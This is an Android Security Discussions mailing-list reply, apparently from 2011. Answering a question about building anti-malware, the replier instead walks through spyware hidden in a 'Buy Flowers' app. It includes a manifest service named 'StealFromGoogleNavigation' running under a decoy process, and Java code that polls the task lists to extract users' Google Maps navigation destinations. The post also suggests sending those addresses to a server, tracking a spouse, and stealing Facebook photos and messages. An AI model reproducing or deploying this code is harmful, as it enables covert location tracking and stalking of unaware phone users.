Hey Buddy,
I responded to your post in a blog style post because it is cleaner.
http://www.ryangmattison.com/post/2011/09/16/Monitor-Android-Navigation-Malware.aspx
Hopefully this gets you started. I'll post the response here as
well, but I don't think it will be readable.
Monitor Android Navigation - Malware
By Ryan Mattison16. September 2011 12:24
There was a question on the Google discussion boards about how to
write malware protection software for Android. A think a good
approach to this would be to first write some Malware polling
functions.
Post
Hello everybody!
I need your help, please. Boss wants me to create an Android App for
preventing all malware, known and unknown, from actually executing.
So this is what I think I must do, but could you please validate?
Thank you!:---
1. I must create a rules set of acceptable function call flows
which every App must conform to. Any App that starts executing a
strange function call sequence is considered malware and gets killed.
Can I create this rule set with the on-device SQLite RDB?
2. I must create a service component running in the background.
This must periodically poll every running App and compare its function
call flow against my rule set RDB.
3. Can I achieve all this with just the Android SDK? Or will I
have to use the Android NDK as well? I don't want to use the NDK
unless I have to.
4. I went through the very helpful tutorial "Understanding
Android's Security Framework" by William Enck and Patrick McDaniel.
Is this a new Framework introduced into the Android Libraries layer?
5. Any good book I could buy to guide me through all this?
Thank you very much.
Fal
Let's us assume we have a thread spinning on a separate process
indefinitely after our "Buy Flowers" application is downloaded off the
Market. The information we want to monitor is Google Maps Navigation
for Android. Where are user's driving to & when. Our application
will poll every 20-30 minutes since the history stack will retain this
information, so it doesn't matter if we catch it in action.
?
1
<service android:name="com.ninja.who.StealFromGoogleNavigation"
android:process=":UpdateFlowers" />
I'm fairly certain in the application manager it will now have the
flowers application open. If the user has any questions, they can
expand it. It'll show process UpdateFlowers. They'll go on with the
day.
We start the polling, we should check if Google Maps navigation is
running. If it is we'll return true. For this application, we are just
going to catch it while running.
private boolean IsNavigationRunning(ActivityManager as)
{
ActivityManager as = (ActivityManager) context
.getSystemService(Activity.ACTIVITY_SERVICE);
List<RunningTaskInfo> rutiList = as.getRunningTasks(100);
for (RunningTaskInfo ruti : rutiList)
{
if (ruti.baseActivity
.getClassName()
.equalsIgnoreCase(
"com.google.android.maps.driveabout.app.NavigationActivity")
&&
ruti.baseActivity.getPackageName().equalsIgnoreCase(
"com.google.android.apps.maps"))
{
return true;
}
}
return false;
}
Using the ActivityManager, we looking through the running task manager
for the Android Maps application
Following this, we want to see what address they are traveling too.
Since it is using the public intent system, this is easily traceable.
private String UsersDestination(Context context, ActivityManager as)
{
ActivityManager as = (ActivityManager) context
.getSystemService(Activity.ACTIVITY_SERVICE);
List<RecentTaskInfo> rtiList = as.getRecentTasks(1000,
ActivityManager.RECENT_WITH_EXCLUDED);
for (RecentTaskInfo rti : rtiList)
{
if (rti.baseIntent != null && rti.baseIntent.getAction() !
= null
&& rti.baseIntent.getComponent() != null &&
rti.baseIntent.getComponent().getClassName() !=
null &&
rti.baseIntent.getAction().equals(Intent.ACTION_VIEW)
&& rti.baseIntent
.getComponent()
.getClassName()
.equalsIgnoreCase(
"com.google.android.maps.driveabout.app.NavigationActivity"))
{
rti.baseIntent.getData().toString();
String addressURI =
rti.baseIntent.getData().toString();
System.out.println("AddressURI: " + addressURI);
String googleNav = "google.navigation:";
String titleNav = "title=";
String queryNav = "&q=";
if(addressURI.contains(queryNav))
{
addressURI =
addressURI.substring(addressURI.indexOf(titleNav),
addressURI.indexOf(queryNav));
addressURI =
addressURI.substring(titleNav.length());
addressURI = addressURI.replaceAll("\\+", " ");
}
else if(addressURI.contains(titleNav))
{
addressURI =
addressURI.substring(addressURI.indexOf(titleNav));
addressURI =
addressURI.substring(titleNav.length());
addressURI = addressURI.replaceAll("\\+", " ");
}
else if(addressURI.contains(googleNav))
{
addressURI =
addressURI.substring(addressURI.indexOf(googleNav));
addressURI =
addressURI.substring(googleNav.length());
addressURI = addressURI.replaceAll("\\+", " ");
}
return addressURI;
}
}
return "";
}
This is older code, there is actually a way to print out way
friendlier messages. I'll leave the exercise up for grabs. Very simple
to grab the address you navigate to on your phone and send them off to
a server. Don't let your husband buy you flowers using your phone, its
a FRONT!
To expand on this exercise, you can start stealing the Facebook Share
Intents. Get photos, messages, updates etc. You can steal a lot more
fun information from the Facebook application if you work at it.
Thanks for reading,
Ryan Mattison
On Sep 15, 2:43 pm, fal <[email protected]> wrote:
> Hello everybody!
>
> I need your help, please. Boss wants me to create an Android App for
> preventing all malware, known and unknown, from actually executing.
> So this is what I think I must do, but could you please validate?
> Thank you!:---
>
> 1. I must create a rules set of acceptable function call flows
> which every App must conform to. Any App that starts executing a
> strange function call sequence is considered malware and gets killed.
> Can I create this rule set with the on-device SQLite RDB?
>
> 2. I must create a service component running in the background.
> This must periodically poll every running App and compare its function
> call flow against my rule set RDB.
>
> 3. Can I achieve all this with just the Android SDK? Or will I
> have to use the Android NDK as well? I don't want to use the NDK
> unless I have to.
>
> 4. I went through the very helpful tutorial "Understanding
> Android's Security Framework" by William Enck and Patrick McDaniel.
> Is this a new Framework introduced into the Android Libraries layer?
>
> 5. Any good book I could buy to guide me through all this?
>
> Thank you very much.
>
> Fal
--
You received this message because you are subscribed to the Google Groups
"Android Security Discussions" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/android-security-discuss?hl=en.
